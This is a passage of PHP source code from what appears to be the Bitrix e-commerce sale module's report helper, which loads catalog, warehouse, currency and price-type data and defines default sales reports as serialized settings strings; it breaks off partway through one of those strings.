// Obtaining the list of iblocks which are directories and filling
// a property $catalogSections with sections of these units.
$ent = new CCatalog();
$result = $ent->GetList();
while ($ibRow = $result->Fetch())
{
// Obtaining list of sections of the catalog.
self::$catalogs[] = $ibRow;
$path = array();
$curLevel = $prevLevel = 0;
$sections = CIBlockSection::GetTreeList(array('=IBLOCK_ID'=>$ibRow['IBLOCK_ID']));
$row = null;
while($row = $sections->GetNext())
{
// Formation of an array of identifiers of current and parent sections.
$curLevel = $row['DEPTH_LEVEL'];
for ($i = 0; $i <= $prevLevel - $curLevel; $i++) array_pop($path);
array_push($path, $row['ID']);
$prevLevel = $curLevel;
self::$catalogSections[$row['ID']] = array(
'name' => ltrim(str_repeat(' . ', $curLevel).$row['NAME']),
'path' => $path,
'catalog' => array(
'ID' => $ibRow['ID'],
'NAME' => $ibRow['NAME']
)
);
}
}
unset($ent, $ibRow, $row, $sections, $result);
// Initialization of the list of warehouses.
$result = Bitrix\Catalog\StoreTable::getList(array('select' => array('ID', 'TITLE')));
while ($row = $result->fetch())
{
self::$productStores[$row['ID']] = $row['TITLE'];
}
unset($row, $result);
// Getting currencies
$obj = new CCurrency();
$by = ''; $order = '';
$result = $obj->GetList($by, $order, LANGUAGE_ID);
while($row = $result->Fetch())
{
self::$currencies[$row['CURRENCY']] = array(
'name' => $row['FULL_NAME']
);
}
unset($row, $result, $obj, $by, $order);
// Getting types of prices
$obj = new CCatalogGroup();
$result = $obj->GetListEx(array('SORT'), array(), false, false, array('ID', 'NAME', 'BASE', 'NAME_LANG'));
while($row = $result->Fetch())
{
self::$priceTypes[$row['ID']] = array(
'name' => (empty($row['NAME_LANG'])) ? $row['NAME'] : $row['NAME_LANG'],
'base' => ($row['BASE'] === 'Y') ? true : false
);
}
unset($row, $result, $obj);
// Getting option, which means, it is necessary to display a fractional quantity of goods of no.
self::$fDecimalQuant = COption::GetOptionString('sale', 'QUANTITY_FACTORIAL') == 'Y';
self::initOwners();
}
}
public static function isInitialized()
{
return self::$fInit;
}
public static function initOwners()
{
if (!self::$fOwnersInit)
{
self::$fOwnersInit = true;
self::addOwner(CSaleReportSaleOrderHelper::getOwnerId());
self::addOwner(CSaleReportUserHelper::getOwnerId());
self::addOwner(CSaleReportSaleBasketHelper::getOwnerId());
self::addOwner(CSaleReportSaleProductHelper::getOwnerId());
}
}
public static function getSiteList()
{
return self::$sitelist;
}
public static function getWeightOptions()
{
return self::$weightOptions;
}
public static function getPriceTypes()
{
return self::$priceTypes;
}
public static function setSelectedPriceTypes($arSelected)
{
$bSelected = false;
reset(self::$priceTypes);
$basePriceTypeKey = key(self::$priceTypes);
foreach (self::$priceTypes as $priceTypeKey => $priceTypeInfo)
{
if ($priceTypeInfo['base'] === true) $basePriceTypeKey = $priceTypeKey;
if (in_array($priceTypeKey, $arSelected, true))
{
self::$priceTypes[$priceTypeKey]['selected'] = true;
$bSelected = true;
}
}
if (!$bSelected) self::$priceTypes[$basePriceTypeKey]['selected'] = true;
}
public static function getCurrencies()
{
return self::$currencies;
}
public static function setSelectedCurrency($currencyId)
{
$currenciesIds = array_keys(self::$currencies);
if (in_array($currencyId, $currenciesIds, true))
{
self::$currencies[$currencyId]['selected'] = true;
self::$reportCurrencyId = $currencyId;
}
else
{
self::$currencies[$currenciesIds[0]]['selected'] = true;
self::$reportCurrencyId = $currenciesIds[0];
}
}
public static function setSiteCurrencyId($currencyId)
{
self::$siteCurrencyId = $currencyId;
}
public static function getSiteCurrencyId()
{
return self::$siteCurrencyId;
}
public static function getReportCurrencyId()
{
return self::$reportCurrencyId;
}
public static function getSiteCookieId()
{
return self::$siteCookieId;
}
public static function getStatusList()
{
return self::$statuslist;
}
public static function getGenders()
{
return self::$genders;
}
public static function getPersonTypes()
{
return self::$personTypes;
}
public static function getDefaultSiteId()
{
return self::$defaultSiteId;
}
public static function isCatalogCorrespondsDefSite($catalogId)
{
$result = false;
$siteId = self::getDefaultSiteId();
if (in_array($catalogId, self::$iblockSite[$siteId])) $result = true;
return $result;
}
public static function getDefaultSiteWeightUnits()
{
return self::$weightOptions[self::$defaultSiteId]['unit'];
}
public static function getDefaultSiteWeightDivider()
{
return self::$weightOptions[self::$defaultSiteId]['koef'];
}
public static function setDefaultSiteId($siteId)
{
self::$defaultSiteId = $siteId;
}
public static function getPaySystemList()
{
return self::$paySystemList;
}
public static function getDeliveryList()
{
return self::$deliveryList;
}
protected static function addOwner($ownerName)
{
if (!in_array($ownerName, self::$owners)) self::$owners[] = $ownerName;
}
public static function getOwners()
{
IncludeModuleLangFile(__FILE__);
return self::$owners;
}
public static function getCatalogSections()
{
return self::$catalogSections;
}
public static function getProductStores()
{
return self::$productStores;
}
public static function getHelperByOwner($ownerId)
{
return 'CSaleReport'.substr($ownerId,strlen(SALE_REPORT_OWNER_ID)+1).'Helper';
}
public static function getDefaultReports()
{
IncludeModuleLangFile(__FILE__);
$reports = array(
'12.0.0' => array(
array(
'owner' => 'sale_SaleBasket',
'title' => GetMessage('SALE_REPORT_DEFAULT_LEFT_BASKETS'),
'description' => GetMessage('SALE_REPORT_DEFAULT_LEFT_BASKETS_DESCR'),
'mark_default' => 1,
'settings' => unserialize('a:7:{s:6:"entity";s:10:"SaleBasket";s:6:"period";a:2:{s:4:"type";'.
's:5:"month";s:5:"value";N;}s:6:"select";a:7:{i:10;a:1:{s:4:"name";s:8:"FUSER_ID";}i:1;'.
'a:1:{s:4:"name";s:21:"FUSER.USER.SHORT_NAME";}i:2;a:1:{s:4:"name";s:16:"FUSER.USER.EMAIL";'.
'}i:6;a:3:{s:4:"name";s:8:"QUANTITY";s:5:"alias";s:14:"xxxxxxxxxxxxxx";s:4:"aggr";s:3:"SUM";'.
'}i:7;a:3:{s:4:"name";s:13:"SUMMARY_PRICE";s:5:"alias";s:17:"xxxxxxxxxxxxxxxxx";s:4:"aggr";'.
's:3:"SUM";}i:4;a:3:{s:4:"name";s:8:"DATE_INS";s:5:"alias";s:13:"xxxxxxxxxxxxx";s:4:"aggr";'.
's:3:"MIN";}i:5;a:3:{s:4:"name";s:8:"DATE_UPD";s:5:"alias";s:14:"xxxxxxxxxxxxxx";s:4:"aggr";'.
's:3:"MAX";}}s:6:"filter";a:1:{i:0;a:3:{i:0;a:5:{s:4:"type";s:5:"field";s:4:"name";'.
's:8:"ORDER_ID";s:7:"compare";s:5:"EQUAL";s:5:"value";s:1:"0";s:10:"changeable";s:1:"0";}i:1;'.
'a:5:{s:4:"type";s:5:"field";s:4:"name";s:31:"FUSER.USER.UserGroup:USER.GROUP";s:7:"compare";'.
's:5:"EQUAL";s:5:"value";s:0:"";s:10:"changeable";s:1:"1";}s:5:"LOGIC";s:3:"AND";}}s:4:"sort";'.
'i:7;s:9:"sort_type";s:4:"DESC";s:5:"limit";N;}'
)
),
array(
'owner' => 'sale_SaleBasket',
'title' => GetMessage('SALE_REPORT_DEFAULT_GOODS_PROFIT'),
'description' => GetMessage('SALE_REPORT_DEFAULT_GOODS_PROFIT_DESCR'),
'mark_default' => 2,
'settings' => unserialize('a:7:{s:6:"entity";s:10:"SaleBasket";s:6:"period";a:2:{s:4:"type";'.
's:3:"all";s:5:"value";N;}s:6:"select";a:7:{i:1;a:1:{s:4:"name";s:10:"PRODUCT_ID";}i:2;'.
'a:1:{s:4:"name";s:4:"NAME";}i:14;a:2:{s:4:"name";s:16:"PRODUCT.QUANTITY";s:5:"alias";'.
's:14:"xxxxxxxxxxxxxx";}i:3;a:3:{s:4:"name";s:8:"ORDER_ID";s:5:"alias";'.
's:14:"xxxxxxxxxxxxxx";s:4:"aggr";s:14:"COUNT_DISTINCT";}i:5;a:3:{s:4:"name";s:8:"QUANTITY";'.
's:5:"alias";s:20:"xxxxxxxxxxxxxxxxxxxx";s:4:"aggr";s:3:"SUM";}i:4;a:3:{s:4:"name";'.
's:5:"PRICE";s:5:"alias";s:19:"xxxxxxxxxxxxxxxxxxx";s:4:"aggr";s:3:"AVG";}i:6;a:3:{s:4:"name";'.
's:13:"SUMMARY_PRICE";s:5:"alias";s:5:"xxxxx";s:4:"aggr";s:3:"SUM";}}s:6:"filter";a:1:{i:0;'.
'a:6:{i:0;a:5:{s:4:"type";s:5:"field";s:4:"name";s:11:"ORDER.PAYED";s:7:"compare";s:5:"EQUAL";'.
's:5:"value";s:4:"true";s:10:"changeable";s:1:"0";}i:1;a:5:{s:4:"type";s:5:"field";s:4:"name";'.
's:23:"ORDER.DATE_INSERT_SHORT";s:7:"compare";s:16:"GREATER_OR_EQUAL";s:5:"value";s:8:"-29 days";'.
's:10:"changeable";s:1:"1";}i:2;a:5:{s:4:"type";s:5:"field";s:4:"name";'.
's:23:"ORDER.DATE_INSERT_SHORT";s:7:"compare";s:13:"LESS_OR_EQUAL";s:5:"value";s:5:"1 day";'.
's:10:"changeable";s:1:"1";}i:3;a:5:{s:4:"type";s:5:"field";s:4:"name";s:4:"NAME";'.
's:7:"compare";s:8:"CONTAINS";s:5:"value";s:0:"";s:10:"changeable";s:1:"1";}i:4;'.
'a:5:{s:4:"type";s:5:"field";s:4:"name";s:33:"PRODUCT.GoodsSection:PRODUCT.SECT";'.
's:7:"compare";s:5:"EQUAL";s:5:"value";s:0:"";s:10:"changeable";s:1:"1";}s:5:"LOGIC";'.
's:3:"AND";}}s:4:"sort";i:6;s:9:"sort_type";s:4:"DESC";s:5:"limit";N;}'
)
),
array(
'owner' => 'sale_SaleProduct',
'title' => GetMessage('SALE_REPORT_DEFAULT_GOODS_INVENTORIES'),
'description' => GetMessage('SALE_REPORT_DEFAULT_GOODS_INVENTORIES_DESCR'),
'mark_default' => 3,
'settings' => unserialize('a:7:{s:6:"entity";s:11:"SaleProduct";s:6:"period";a:2:{s:4:"type";'.
's:3:"all";s:5:"value";N;}s:6:"select";a:5:{i:0;a:1:{s:4:"name";s:2:"ID";}i:2;a:1:{s:4:"name";'.
's:4:"NAME";}i:1;a:2:{s:4:"name";s:8:"QUANTITY";s:5:"alias";s:7:"xxxxxxx";}i:3;'.
'a:2:{s:4:"name";s:22:"PRICE_IN_SITE_CURRENCY";s:5:"alias";s:4:"xxxx";}i:5;a:2:{s:4:"name";'.
's:30:"SUMMARY_PRICE_IN_SITE_CURRENCY";s:5:"alias";s:15:"xxxxxxxxxxxxxxx";}}s:6:"filter";'.
'a:1:{i:0;a:10:{i:0;a:5:{s:4:"type";s:5:"field";s:4:"name";s:4:"NAME";s:7:"compare";'.
's:8:"CONTAINS";s:5:"value";s:0:"";s:10:"changeable";s:1:"1";}i:1;a:5:{s:4:"type";s:5:"field";'.
's:4:"name";s:51:"IBLOCK.SectionElement:IBLOCK_ELEMENT.IBLOCK_SECTION";s:7:"compare";'.
's:5:"EQUAL";s:5:"value";s:0:"";s:10:"changeable";s:1:"1";}i:2;a:5:{s:4:"type";s:5:"field";'.
's:4:"name";s:8:"QUANTITY";s:7:"compare";s:16:"GREATER_OR_EQUAL";s:5:"value";s:0:"";'.
's:10:"changeable";s:1:"1";}i:3;a:5:{s:4:"type";s:5:"field";s:4:"name";s:8:"QUANTITY";'.
's:7:"compare";s:13:"LESS_OR_EQUAL";s:5:"value";s:0:"";s:10:"changeable";s:1:"1";}i:4;'.
'a:5:{s:4:"type";s:5:"field";s:4:"name";s:22:"PRICE_IN_SITE_CURRENCY";s:7:"compare";'.
's:16:"GREATER_OR_EQUAL";s:5:"value";s:0:"";s:10:"changeable";s:1:"1";}i:5;a:5:{s:4:"type";'.
's:5:"field";s:4:"name";s:22:"PRICE_IN_SITE_CURRENCY";s:7:"compare";s:13:"LESS_OR_EQUAL";'.
's:5:"value";s:0:"";s:10:"changeable";s:1:"1";}i:6;a:5:{s:4:"type";s:5:"field";s:4:"name";'.
's:30:"SUMMARY_PRICE_IN_SITE_CURRENCY";s:7:"compare";s:16:"GREATER_OR_EQUAL";s:5:"value";'.
's:0:"";s:10:"changeable";s:1:"1";}i:7;a:5:{s:4:"type";s:5:"field";s:4:"name";'.
's:30:"SUMMARY_PRICE_IN_SITE_CURRENCY";s:7:"compare";s:13:"LESS_OR_EQUAL";s:5:"value";s:0:"";'.
's:10:"changeable";s:1:"1";}i:8;a:5:{s:4:"type";s:5:"field";s:4:"name";s:6:"ACTIVE";'.
's:7:"compare";s:5:"EQUAL";s:5:"value";s:4:"true";s:10:"changeable";s:1:"1";}s:5:"LOGIC";'.
's:3:"AND";}}s:4:"sort";i:1;s:9:"sort_type";s:3:"ASC";s:5:"limit";N;}'
)
),
array(
'owner' => 'sale_SaleOrder',
'title' => GetMessage('SALE_REPORT_DEFAULT_BEST_CLIENTS'),
'description' => GetMessage('SALE_REPORT_DEFAULT_BEST_CLIENTS_DESCR'),
'mark_default' => 4,
'settings' => unserialize(
'a:7:{s:6:"entity";s:9:"SaleOrder";s:6:"period";a:2:{s:4:"type";s:5:"month";s:5:"value";N;}'.
's:6:"select";a:7:{i:7;a:1:{s:4:"name";s:7:"USER.ID";}i:6;a:1:{s:4:"name";'.
's:15:"USER.SHORT_NAME";}i:0;a:3:{s:4:"name";s:2:"ID";s:5:"alias";s:14:"xxxxxxxxxxxxxx";'.
's:4:"aggr";s:14:"COUNT_DISTINCT";}i:2;a:3:{s:4:"name";s:14:"PRODUCTS_QUANT";s:5:"alias";'.
's:14:"xxxxxxxxxxxxxx";s:4:"aggr";s:3:"SUM";}i:3;a:3:{s:4:"name";s:12:"DISCOUNT_ALL";'.
's:5:"alias";s:15:"xxxxxxxxxxxxxxx";s:4:"aggr";s:3:"SUM";}i:14;a:3:{s:4:"name";'.
's:15:"SUM_PAID_FORREP";s:5:"alias";s:13:"xxxxxxxxxxxxx";s:4:"aggr";s:3:"AVG";}i:5;'.
'a:3:{s:4:"name";s:15:"SUM_PAID_FORREP";s:5:"alias";s:16:"xxxxxxxxxxxxxxxx";s:4:"aggr";'.
's:3:"SUM";}}s:6:"filter";a:1:{i:0;a:4:{i:0;a:5:{s:4:"type";s:5:"field";s:4:"name";'.
's:4:"USER";s:7:"compare";s:5:"EQUAL";s:5:"value";s:0:"";s:10:"changeable";s:1:"1";}i:1;'.
'a:5:{s:4:"type";s:5:"field";s:4:"name";s:25:"USER.UserGroup:USER.GROUP";s:7:"compare";'.
's:5:"EQUAL";s:5:"value";s:0:"";s:10:"changeable";s:1:"1";}i:2;a:5:{s:4:"type";'.
's:5:"field";s:4:"name";s:5:"PAYED";s:7:"compare";s:5:"EQUAL";s:5:"value";s:4:"true";'.
's:10:"changeable";s:1:"1";}s:5:"LOGIC";s:3:"AND";}}s:4:"sort";i:5;s:9:"sort_type";'.
's:4:"DESC";s:5:"limit";N;}'
)
),
array(
'owner' => 'sale_User',
'title' => GetMessage('SALE_REPORT_DEFAULT_NEW_CLIENTS'),
'description' => GetMessage('SALE_REPORT_DEFAULT_NEW_CLIENTS_DESCR'),
'mark_default' => 5,
'settings' => unserialize('a:7:{s:6:"entity";s:16:"Bitrix\Main\User";s:6:"period";a:2:{s:4:"type";s:5:"month";'.
's:5:"value";N;}s:6:"select";a:7:{i:11;a:1:{s:4:"name";s:14:"DATE_REG_SHORT";}i:0;'.
'a:3:{s:4:"name";s:2:"ID";s:5:"alias";s:18:"xxxxxxxxxxxxxxxxxx";s:4:"aggr";'.
's:14:"COUNT_DISTINCT";}i:3;a:3:{s:4:"name";s:35:"Bitrix\Sale\Internals\Order:USER.ID";s:5:"alias";'.
's:14:"xxxxxxxxxxxxxx";s:4:"aggr";s:14:"COUNT_DISTINCT";}i:4;a:3:{s:4:"name";'.
's:45:"Bitrix\Sale\Internals\Order:USER.DISCOUNT_ALL";s:5:"alias";s:15:"xxxxxxxxxxxxxxx";'.
's:4:"aggr";s:3:"SUM";}i:9;a:3:{s:4:"name";s:38:"Bitrix\Sale\Internals\Order:USER.PRICE";'.
's:5:"alias";s:13:"xxxxxxxxxxxxx";s:4:"aggr";s:3:"AVG";}i:5;a:3:{s:4:"name";'.
's:38:"Bitrix\Sale\Internals\Order:USER.PRICE";s:5:"alias";s:16:"xxxxxxxxxxxxxxxx";s:4:"aggr";'.
's:3:"SUM";}i:6;a:3:{s:4:"name";s:48:"Bitrix\Sale\Internals\Order:USER.SUM_PAID_FORREP";'.
's:5:"alias";s:8:"xxxxxxxx";s:4:"aggr";s:3:"SUM";}}s:6:"filter";a:1:{i:0;a:2:{i:0;'.
'a:5:{s:4:"type";s:5:"field";s:4:"name";s:20:"UserGroup:USER.GROUP";s:7:"compare";'.
's:5:"EQUAL";s:5:"value";s:0:"";s:10:"changeable";s:1:"1";}s:5:"LOGIC";s:3:"AND";}}'.
's:4:"sort";i:11;s:9:"sort_type";s:4:"DESC";s:5:"limit";N;}'
)
),
array(
'owner' => 'sale_SaleOrder',
'title' => GetMessage('SALE_REPORT_DEFAULT_SALES'),
'description' => GetMessage('SALE_REPORT_DEFAULT_SALES_DESCR'),
'mark_default' => 6,
'settings' => unserialize('a:7:{s:6:"entity";s:9:"SaleOrder";s:6:"period";a:2:{s:4:"type";'.
's:5:"month";s:5:"value";N;}s:6:"select";a:8:{i:1;a:2:{s:4:"name";s:17:"DATE_INSERT_SHORT";'.
's:5:"alias";s:4:"xxxx";}i:0;a:3:{s:4:"name";s:2:"ID";s:5:"alias";s:14:"xxxxxxxxxxxxxx";'.
's:4:"aggr";s:14:"COUNT_DISTINCT";}i:13;a:3:{s:4:"name";s:14:"PRODUCTS_QUANT";s:5:"alias";'.
's:13:"xxxxxxxxxxxxx";s:4:"aggr";s:3:"SUM";}i:2;a:3:{s:4:"name";s:9:"TAX_VALUE";'.
's:5:"alias";s:6:"xxxxxx";s:4:"aggr";s:3:"SUM";}i:3;a:3:{s:4:"name";s:14:"PRICE_DELIVERY";'.
's:5:"alias";s:8:"xxxxxxxx";s:4:"aggr";s:3:"SUM";}i:4;a:3:{s:4:"name";s:12:"DISCOUNT_ALL";'.
's:5:"alias";s:6:"xxxxxx";s:4:"aggr";s:3:"SUM";}i:5;a:3:{s:4:"name";s:5:"PRICE";'.
's:5:"alias";s:16:"xxxxxxxxxxxxxxxx";s:4:"aggr";s:3:"SUM";}i:6;a:3:{s:4:"name";'.
's:15:"SUM_PAID_FORREP";s:5:"alias";s:8:"xxxxxxxx";s:4:"aggr";s:3:"SUM";}}s:6:"filter";'.
'a:1:{i:0;a:2:{i:0;a:5:{s:4:"type";s:5:"field";s:4:"name";'.
's:25:"USER.UserGroup:USER.GROUP";s:7:"compare";s:5:"EQUAL";s:5:"value";s:0:"";'.
's:10:"changeable";s:1:"1";}s:5:"LOGIC";s:3:"AND";}}s:4:"sort";i:1;s:9:"sort_type";'.
's:4:"DESC";s:5:"limit";N;}'
)
),
array(
'owner' => 'sale_SaleProduct',
'title' => GetMessage('SALE_REPORT_DEFAULT_MOST_EXPECTED_GOODS'),
'description' => GetMessage('SALE_REPORT_DEFAULT_MOST_EXPECTED_GOODS_DESCR'),
'mark_default' => 7,
'settings' => unserialize('a:10:{s:6:"entity";s:29:"Bitrix\\Sale\\Internals\\Product";'.
's:6:"period";a:2:{s:4:"type";s:5:"month";s:5:"value";N;}s:6:"select";a:4:{i:0;a:2:{'.
's:4:"name";s:2:"ID";s:5:"alias";s:9:"xxxxxxxxx";}i:1;a:2:{s:4:"name";s:4:"NAME";s:5:"alias";'.
's:19:"xxxxxxxxxxxxxxxxxxx";}i:2;a:3:{s:4:"name";s:31:"SUBSCRIPTIONS_IN_PERIOD_BY_SHOP";'.
's:5:"alias";s:15:"xxxxxxxxxxxxxxx";s:4:"aggr";s:3:"SUM";}i:3;a:3:{s:4:"name";'.
's:22:"PRICE_IN_SITE_CURRENCY";s:5:"alias";s:15:"xxxxxxxxxxxxxxx";s:4:"aggr";s:3:"SUM";}}'.
's:6:"filter";a:1:{i:0;a:6:{i:0;a:5:{s:4:"type";s:5:"field";s:4:"name";'.
's:31:"SUBSCRIPTIONS_IN_PERIOD_BY_SHOP";s:7:"compare";s:7:"GREATER";s:5:"value";s:1:"0";'.
's:10:"changeable";s:1:"0";}i:1;a:5:{s:4:"type";s:5:"field";s:4:"name";s:4:"NAME";'.
's:7:"compare";s:8:"CONTAINS";s:5:"value";s:0:"";s:10:"changeable";s:1:"1";}i:2;a:5:{'.
's:4:"type";s:5:"field";s:4:"name";s:51:"IBLOCK.SectionElement:IBLOCK_ELEMENT.IBLOCK_SECTION";'.
's:7:"compare";s:5:"EQUAL";s:5:"value";a:1:{i:0;s:0:"";}s:10:"changeable";s:1:"1";}i:3;a:5:{'.
's:4:"type";s:5:"field";s:4:"name";s:22:"PRICE_IN_SITE_CURRENCY";s:7:"compare";'.
's:16:"GREATER_OR_EQUAL";s:5:"value";s:0:"";s:10:"changeable";s:1:"1";}i:4;a:5:{s:4:"type";'.
's:5:"field";s:4:"name";s:22:"PRICE_IN_SITE_CURRENCY";s:7:"compare";s:13:"LESS_OR_EQUAL";'.
's:5:"value";s:0:"";s:10:"changeable";s:1:"1";}s:5:"LOGIC";s:3:"AND";}}s:4:"sort";i:0;'.
's:9:"sort_type";s:3:"ASC";s:5:"limit";N;s:12:"red_neg_vals";b:0;s:13:"grouping_mode";b:0;'.
's:5:"chart";N;}'
)
),
array(
'owner' => 'sale_SaleProduct',
'title' => GetMessage('SALE_REPORT_DEFAULT_MOST_VIEWED_GOODS'),
'description' => GetMessage('SALE_REPORT_DEFAULT_MOST_VIEWED_GOODS_DESCR'),
'mark_default' => 8,
'settings' => unserialize('a:7:{s:6:"entity";s:11:"SaleProduct";s:6:"period";a:2:{s:4:"type";'.
's:5:"month";s:5:"value";N;}s:6:"select";a:7:{i:0;a:1:{s:4:"name";s:2:"ID";}i:1;'.
'a:1:{s:4:"name";s:4:"NAME";}i:7;a:2:{s:4:"name";s:23:"VIEWS_IN_PERIOD_BY_SHOP";s:5:"alias";'.
's:10:"xxxxxxxxxx";}i:8;a:2:{s:4:"name";s:24:"ORDERS_IN_PERIOD_BY_SHOP";s:5:"alias";'.
's:18:"xxxxxxxxxxxxxxxxxx";}i:14;a:1:{s:4:"name";s:10:"CONVERSION";}i:12;a:2:{s:4:"name";'.
's:32:"SALED_PRODUCTS_IN_PERIOD_BY_SHOP";s:5:"alias";s:7:"xxxxxxx";}i:5;a:2:{s:4:"name";'.
's:22:"PRICE_IN_SITE_CURRENCY";s:5:"alias";s:15:"xxxxxxxxxxxxxxx";}}s:6:"filter";a:1:{i:0;'.
'a:7:{i:0;a:5:{s:4:"type";s:5:"field";s:4:"name";s:4:"NAME";s:7:"compare";'.
's:8:"CONTAINS";s:5:"value";s:0:"";s:10:"changeable";s:1:"1";}i:1;a:5:{s:4:"type";s:5:"field";'.
's:4:"name";s:51:"IBLOCK.SectionElement:IBLOCK_ELEMENT.IBLOCK_SECTION";s:7:"compare";'.
's:5:"EQUAL";s:5:"value";s:0:"";s:10:"changeable";s:1:"1";}i:2;a:5:{s:4:"type";s:5:"field";'.
's:4:"name";s:10:"CONVERSION";s:7:"compare";s:16:"GREATER_OR_EQUAL";s:5:"value";s:0:"";'.
's:10:"changeable";s:1:"1";}i:3;a:5:{s:4:"type";s:5:"field";s:4:"name";s:23:"VIEWS_IN_PERIOD_BY_SHOP";'.
's:7:"compare";s:16:"GREATER_OR_EQUAL";s:5:"value";s:0:"";s:10:"changeable";s:1:"1";}i:4;'.
'a:5:{s:4:"type";s:5:"field";s:4:"name";s:22:"PRICE_IN_SITE_CURRENCY";s:7:"compare";'.
's:16:"GREATER_OR_EQUAL";s:5:"value";s:0:"";s:10:"changeable";s:1:"1";}i:5;a:5:{s:4:"type";'.
's:5:"field";s:4:"name";s:6:"ACTIVE";s:7:"compare";s:5:"EQUAL";s:5:"value";s:4:"true";'.
's:10:"changeable";s:1:"0";}s:5:"LOGIC";s:3:"AND";}}s:4:"sort";i:7;s:9:"sort_type";s:4:"DESC";'.
's:5:"limit";N;}'
)
)
),
'12.5.0' => array(
array(
'owner' => 'sale_SaleProduct',
'title' => GetMessage('SALE_REPORT_DEFAULT_GOODS_INVENTORIES__12_5'),
'description' => '',
'mark_default' => 9,
'settings' => unserialize('a:11:{s:6:"entity";s:29:"Bitrix\Sale\Internals\Product";s:6:"period";'.
'a:2:{s:4:"type";s:5:"month";s:5:"value";N;}s:6:"select";a:6:{i:2;a:4:{s:4:"name";'.
's:56:"IBLOCK.SectionElement:IBLOCK_ELEMENT.IBLOCK_SECTION.NAME";'.
's:5:"alias";s:9:"xxxxxxxxx";s:4:"aggr";s:12:"GROUP_CONCAT";s:8:"grouping";'.
'b:1;}i:8;a:2:{s:4:"name";s:15:"NAME_WITH_IDENT";s:8:"grouping";b:1;}i:12;'.
'a:3:{s:4:"name";s:34:"ARRIVED_PRODUCTS_IN_PERIOD_BY_SHOP";s:5:"alias";s:6:"xxxxxx";'.
's:17:"grouping_subtotal";b:1;}i:6;a:3:{s:4:"name";s:32:"SALED_PRODUCTS_IN_PERIOD_BY_SHOP";'.
's:5:"alias";s:6:"xxxxxx";s:17:"grouping_subtotal";b:1;}i:3;a:3:{s:4:"name";'.
's:8:"QUANTITY";s:5:"alias";s:16:"xxxxxxxx xxxxxxx";s:17:"grouping_subtotal";'.
'b:1;}i:11;a:1:{s:4:"name";s:22:"PRICE_IN_SITE_CURRENCY";}}s:6:"filter";'.
'a:1:{i:0;a:3:{i:0;a:5:{s:4:"type";s:5:"field";s:4:"name";s:6:"ACTIVE";s:7:"compare";'.
's:5:"EQUAL";s:5:"value";s:4:"true";s:10:"changeable";s:1:"0";}i:1;a:5:{s:4:"type";'.
's:5:"field";s:4:"name";s:51:"IBLOCK.SectionElement:IBLOCK_ELEMENT.IBLOCK_SECTION";'.
's:7:"compare";s:5:"EQUAL";s:5:"value";a:1:{i:0;s:0:"";}s:10:"changeable";'.
's:1:"1";}s:5:"LOGIC";s:3:"AND";}}s:4:"sort";i:8;s:9:"sort_type";s:3:"ASC";'.
's:5:"limit";N;s:12:"red_neg_vals";b:1;s:13:"grouping_mode";b:1;s:5:"chart";'.
'N;s:6:"mobile";a:1:{s:7:"enabled";b:1;}}')
),
array(
'owner' => 'sale_SaleProduct',
'title' => GetMessage('SALE_REPORT_DEFAULT_PRICE_LIST__12_5'),
'description' => '',
'mark_default' => 10,
'settings' => unserialize('a:12:{s:6:"entity";s:29:"Bitrix\Sale\Internals\Product";s:6:"period";'.
'a:2:{s:4:"type";s:5:"month";s:5:"value";N;}s:6:"select";a:2:{i:4;a:4:{s:4:"name";'.
's:56:"IBLOCK.SectionElement:IBLOCK_ELEMENT.IBLOCK_SECTION.NAME";'.
's:5:"alias";s:9:"xxxxxxxxx";s:4:"aggr";s:12:"GROUP_CONCAT";s:8:"grouping";'.
'b:1;}i:12;a:2:{s:4:"name";s:15:"NAME_WITH_IDENT";s:8:"grouping";b:1;}}s:6:"filter";'.
'a:1:{i:0;a:3:{i:0;a:5:{s:4:"type";s:5:"field";s:4:"name";s:6:"ACTIVE";s:7:"compare";'.
's:5:"EQUAL";s:5:"value";s:4:"true";s:10:"changeable";s:1:"0";}i:1;a:5:{s:4:"type";'.
's:5:"field";s:4:"name";s:51:"IBLOCK.SectionElement:IBLOCK_ELEMENT.IBLOCK_SECTION";'.
's:7:"compare";s:5:"EQUAL";s:5:"value";a:1:{i:0;s:0:"";}s:10:"changeable";'.
's:1:"1";}s:5:"LOGIC";s:3:"AND";}}s:4:"sort";i:12;s:9:"sort_type";s:3:"ASC";'.
's:5:"limit";N;s:12:"red_neg_vals";b:1;s:13:"grouping_mode";b:1;s:11:"helper_spec";'.
'a:1:{s:5:"ucspt";b:1;}s:5:"chart";N;s:6:"mobile";a:1:{s:7:"enabled";b:1;}}')
),
array(
'owner' => 'sale_SaleBasket',
'title' => GetMessage('SALE_REPORT_DEFAULT_GOODS_PROFIT__12_5'),
'description' => '',
'mark_default' => 11,
'settings' => unserialize('a:11:{s:6:"entity";s:28:"Bitrix\Sale\Internals\Basket";s:6:"period";'.
'a:2:{s:4:"type";s:5:"month";s:5:"value";N;}s:6:"select";a:6:{i:6;a:2:{s:4:"name";'.
's:15:"NAME_WITH_IDENT";s:8:"grouping";b:1;}i:7;a:4:{s:4:"name";s:8:"QUANTITY";'.
's:5:"alias";s:10:"xxxxxxxxxx";s:4:"aggr";s:3:"SUM";s:17:"grouping_subtotal";'.
'b:1;}i:5;a:4:{s:4:"name";s:13:"SUMMARY_PRICE";s:5:"alias";s:16:"xxxxxxxxx xxxxxx";'.
's:4:"aggr";s:3:"SUM";s:17:"grouping_subtotal";b:1;}i:9;a:4:{s:4:"name";'.
's:24:"SUMMARY_PURCHASING_PRICE";s:5:"alias";s:13:"xxxxxxxxxxxxx";s:4:"aggr";s:3:"SUM";'.
's:17:"grouping_subtotal";b:1;}i:10;a:4:{s:4:"name";s:12:"GROSS_PROFIT";s:5:"alias";'.
's:15:"xxxxxxx xxxxxxx";s:4:"aggr";s:3:"SUM";s:17:"grouping_subtotal";b:1;}i:11;'.
'a:4:{s:4:"name";s:13:"PROFITABILITY";s:5:"alias";s:18:"xxxxxxxxxxxxxx (%)";s:4:"aggr";'.
's:3:"AVG";s:17:"grouping_subtotal";b:1;}}s:6:"filter";a:1:{i:0;a:4:{i:0;a:5:{s:4:"type";'.
's:5:"field";s:4:"name";s:11:"ORDER.PAYED";s:7:"compare";s:5:"EQUAL";s:5:"value";'.
's:4:"true";s:10:"changeable";s:1:"0";}i:1;a:5:{s:4:"type";s:5:"field";s:4:"name";'.
's:4:"NAME";s:7:"compare";s:8:"CONTAINS";s:5:"value";s:0:"";s:10:"changeable";'.
's:1:"1";}i:2;a:5:{s:4:"type";s:5:"field";s:4:"name";s:33:"PRODUCT.GoodsSection:PRODUCT.SECT";'.
's:7:"compare";s:5:"EQUAL";s:5:"value";a:1:{i:0;s:0:"";}s:10:"changeable";'.
